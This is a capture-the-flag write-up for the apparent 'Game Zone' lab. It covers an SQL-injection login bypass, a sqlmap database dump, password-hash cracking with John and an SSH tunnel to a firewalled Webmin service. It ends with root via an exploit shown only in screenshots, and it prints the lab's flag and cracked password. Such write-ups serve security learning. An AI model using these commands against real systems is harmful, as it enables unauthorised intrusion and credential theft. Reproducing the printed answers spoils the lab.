![[Pasted image 20250623224357.png]] --- ### Deploy the machine and access its web server. ### What is the name of the large cartoon avatar holding a sniper on the forum? ![[Pasted image 20250622235020.png]] ![[Pasted image 20250622235033.png]] Performed a reverse image search and found the name of the character. ```text Agent 47 ``` ### When you've logged in, what page do you get redirected to? The `log in` field is vulnerable to SQL injection attack. A very basic SQLi can bypass the login authentication. ![[Pasted image 20250623000125.png]] ![[Pasted image 20250623000138.png]] When logged in, you get redirected to `/portal.php` page ```bash /portal.php ``` # SQLMAP We're going to use `SQLMap` to dump the entire database for Game Zone but first we need to intercept a request made to the search feature using Burp. Let's save this request into a text file. We can then pass this into SQLMap to use our authenticated user session. ![[Pasted image 20250623211454.png]] ![[Pasted image 20250623211630.png]] ```bash root@ip-10-10-74-233:~/Desktop# cat request.txt POST /portal.php HTTP/1.1 Host: 10.10.116.19 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 15 Origin: http://10.10.116.19 Connection: keep-alive Referer: http://10.10.116.19/portal.php Cookie: PHPSESSID=nqsldq9v584ogq3orqq5oah855 Upgrade-Insecure-Requests: 1 Priority: u=0, i ``` `sqlmap -r request.txt --dbms=mysql --dump` - `-r`: use the intercepted request you saved earlier - `--dbms`: tells SQLMap what type of database management system it is - `--dump`: attempts to output the entire database SQLMap will not try different methods and identify the one that vulnerable. Eventually, it will output the database. ![[Pasted image 20250623211945.png]] ![[Pasted image 20250623213318.png]] ### In the users table, what is the hashed password? ``` ab5db... ``` ### What was the username associated with the hashed password? ```bash agent47 ``` ### What was the other table name? ```bash post ``` ### What is the de-hashed password? ```bash videogamer124 ``` ```bash root@ip-10-10-74-233:~/Desktop# echo "ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14" > hash.txt root@ip-10-10-74-233:~/Desktop# john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256 Using default input encoding: UTF-8 Loaded 1 password hash (Raw-SHA256 [SHA256 256/256 AVX2 8x]) Warning: poor OpenMP scalability for this hash type, consider --fork=2 Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status videogamer124 (?) 1g 0:00:00:00 DONE (2025-06-24 03:43) 1.190g/s 3471Kp/s 3471Kc/s 3471KC/s vimivera..veluasan Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably Session completed. ``` ### What is the user flag? ```bash 649ac17b1480ac13ef1e4fa579dac95c ``` ```bash root@ip-10-10-74-233:~/Desktop# ssh [email protected] [email protected]'s password: ``` ```bash agent47@gamezone:~$ whoami agent47 agent47@gamezone:~$ ls user.txt agent47@gamezone:~$ cat user.txt 649ac17b1480ac13ef1e4fa579dac95c ``` --- Reverse SSH port forwarding specifies that the given port on the remote server host is to be forwarded to the given host and port on the local side. `-L` is a local tunnel (`YOU <- Client`). If a site was blocked, you can forward the traffic to a server you own and view it. For example, if imgur was blocked at work, you can do `ssh -L 9000:imgur.com:80 [email protected]`. Going to localhost:9000 on your machine, will load imgure traffic using your other server. `-R` is a remote tunnel (`YOU -> Client`). You forward your traffic to the other server for others to view. ### How many TCP sockets are running? ```bash 5 ``` ![[Pasted image 20250623215504.png]] We can see that a service running on port 10000 is blocked via a firewall rule from the outside. However, using a SSH tunnel we can expose the port to us locally. From our local machine, run `ssh -L 10000:localhost:10000 <username>@<IP>`. Once complete, in your browser, type `localhost:10000` and you can access the newly-exposed webserver. ```bash root@ip-10-10-74-233:~/Desktop# ssh -L 10000:localhost:10000 [email protected] [email protected]'s password: Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 109 packages can be updated. 68 updates are security updates. Last login: Mon Jun 23 22:03:19 2025 from 10.10.116.19 agent47@gamezone:~$ ``` ### What is the name of the exposed CMS? ```bash webmin ``` ![[Pasted image 20250623221033.png]] ### What is the CMS version? ```bash 1.580 ``` I've reused the creds I found earlier `agent47:videogamer124` and I successfully logged into the webmin server. ![[Pasted image 20250623222013.png]] # Privilege Escalation After adjusting the settings of the exploit, I was able to have a session as root! ![[Pasted image 20250623222255.png]] ![[Pasted image 20250623224157.png]]